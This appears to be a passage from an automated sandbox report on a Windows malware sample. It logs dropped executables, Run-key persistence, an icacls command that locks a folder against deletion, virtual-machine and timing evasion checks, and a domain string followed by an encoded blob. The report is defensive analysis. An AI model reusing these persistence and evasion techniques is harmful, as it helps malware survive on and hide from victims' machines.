          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\pewuhagedisene88\fafi.pdb source: explorer.exe, 00000004.00000003.361183875.0000000005940000.00000004.00000001.00020000.00000000.sdmp, 4113.exe, 0000000B.00000000.360714654.0000000000401000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
          Source: Binary string: C:\hukesonu\cab71\kedir\81\zu.pdb source: D8D3.exe, 00000013.00000000.402009575.0000000000401000.00000020.00000001.01000000.00000011.sdmp
          Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb` source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
          Source: Binary string: eFI,d(C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
          Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\min gaferovasomo\kimi wipeyumamu16\jigewenege.pdb source: explorer.exe, 00000004.00000003.365557509.000000000B700000.00000004.00000001.00020000.00000000.sdmp, 3046.exe, 0000000D.00000002.396339058.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000D.00000000.364021519.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000F.00000000.394852843.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000021.00000000.447684089.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000021.00000002.509435765.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000002.603085985.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000000.461163499.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000027.00000002.514112881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000027.00000000.466448303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
          Source: Binary string: 3JC:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
          Source: Binary string: d:\administrator\desktop\apphttp\release\apphttp.pdb source: pliu.exe, 0000001B.00000000.437990419.000000000040E000.00000002.00000001.01000000.00000014.sdmp, pliu.exe, 0000001B.00000002.467843346.000000000040E000.00000002.00000001.01000000.00000014.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\AppData\Local\Temp\4113.exeUnpacked PE file: 11.2.4113.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\3046.exeUnpacked PE file: 15.2.3046.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\AppData\Local\Temp\4113.exeUnpacked PE file: 11.2.4113.exe.400000.0.unpack .text:ER;.data:W;.guno:R;.jofolo:R;.nabog:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\Temp\3046.exeUnpacked PE file: 15.2.3046.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\Temp\E4.exeUnpacked PE file: 17.2.E4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\AppData\Local\Temp\ECFB.exeUnpacked PE file: 18.2.ECFB.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BA11 push ecx; ret
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00932DC0 push 6700D42Eh; retf
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00931F68 push 623D8A45h; retf
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004363BD push esi; ret
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004139F8 push ecx; ret
          Source: 4113.exe.4.drStatic PE information: section name: .guno
          Source: 4113.exe.4.drStatic PE information: section name: .jofolo
          Source: 4113.exe.4.drStatic PE information: section name: .nabog
          Source: 98D7.exe.4.drStatic PE information: section name: _RDATA
          Source: 98D7.exe.4.drStatic PE information: section name: .vmp0
          Source: 98D7.exe.4.drStatic PE information: section name: .vmp1
          Source: llpb1133.exe.14.drStatic PE information: section name: _RDATA
          Source: llpb1133.exe.14.drStatic PE information: section name: .vmp0
          Source: llpb1133.exe.14.drStatic PE information: section name: .vmp1
          Source: XandETC.exe.14.drStatic PE information: section name: .xdata
          Source: nss3.dll.19.drStatic PE information: section name: .00cfg
          Source: msvcp140.dll.19.drStatic PE information: section name: .didat
          Source: mozglue.dll.19.drStatic PE information: section name: .00cfg
          Source: freebl3.dll.19.drStatic PE information: section name: .00cfg
          Source: softokn3.dll.19.drStatic PE information: section name: .00cfg
          Source: sqlite3.dll.19.drStatic PE information: section name: /4
          Source: sqlite3.dll.19.drStatic PE information: section name: /19
          Source: sqlite3.dll.19.drStatic PE information: section name: /31
          Source: sqlite3.dll.19.drStatic PE information: section name: /45
          Source: sqlite3.dll.19.drStatic PE information: section name: /57
          Source: sqlite3.dll.19.drStatic PE information: section name: /70
          Source: sqlite3.dll.19.drStatic PE information: section name: /81
          Source: sqlite3.dll.19.drStatic PE information: section name: /92
          Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
          Source: 98D7.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x383f10
          Source: pliu.exe.14.drStatic PE information: real checksum: 0x2b520 should be: 0x29e17
          Source: A33B.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x76ad5c
          Source: llpb1133.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x383f10

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jhevwvtJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sievwvtJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\nss3.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\vcruntime140.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3046.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\98D7.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E4.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeFile created: C:\Users\user\AppData\Local\Temp\llpb1133.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeFile created: C:\Users\user\AppData\Local\Temp\pliu.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\msvcp140.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jhevwvtJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D8D3.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeFile created: C:\Users\user\AppData\Local\Temp\db.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FB61.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ECFB.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeFile created: C:\Users\user\AppData\Local\Temp\XandETC.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sievwvtJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\3046.exeFile created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\12C0.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4113.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\mozglue.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A33B.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\3046.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\sievwvt:Zone.Identifier read attributes | delete
          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jhevwvt:Zone.Identifier read attributes | delete
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: file.exe, 00000000.00000002.313456066.0000000000939000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeRDTSC instruction interceptor: First address: 00000001405FFCC5 second address: 00000001405FFCCC instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 rcr edx, 6Dh 0x00000007 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeRDTSC instruction interceptor: First address: 00000001405FFCCC second address: 00000001405FFCE7 instructions: 0x00000000 rdtsc 0x00000002 rcl dl, cl 0x00000004 ror cl, 1 0x00000006 mov dx, 05D0h 0x0000000a movzx ax, bl 0x0000000e sub cl, FFFFFFCCh 0x00000011 clc 0x00000012 neg cl 0x00000014 inc eax 0x00000015 xor bh, cl 0x00000017 setl dl 0x0000001a lahf 0x0000001b rdtsc
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeRDTSC instruction interceptor: First address: 00000001405FFCC5 second address: 00000001405FFCCC instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 rcr edx, 6Dh 0x00000007 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeRDTSC instruction interceptor: First address: 00000001405FFCCC second address: 00000001405FFCE7 instructions: 0x00000000 rdtsc 0x00000002 rcl dl, cl 0x00000004 ror cl, 1 0x00000006 mov dx, 05D0h 0x0000000a movzx ax, bl 0x0000000e sub cl, FFFFFFCCh 0x00000011 clc 0x00000012 neg cl 0x00000014 inc eax 0x00000015 xor bh, cl 0x00000017 setl dl 0x0000001a lahf 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Windows\explorer.exe TID: 3568Thread sleep time: -450000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\A33B.exe TID: 2992Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\98D7.exe TID: 5164Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\pliu.exe TID: 3516Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\pliu.exe TID: 4604Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 410
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 447
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 855
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 842
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\db.dllJump to dropped file
          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FB61.exeJump to dropped file
          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\12C0.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeThread delayed: delay time: 922337203685477
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iueg.aappatey.comiueg.aappatey.comFbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259
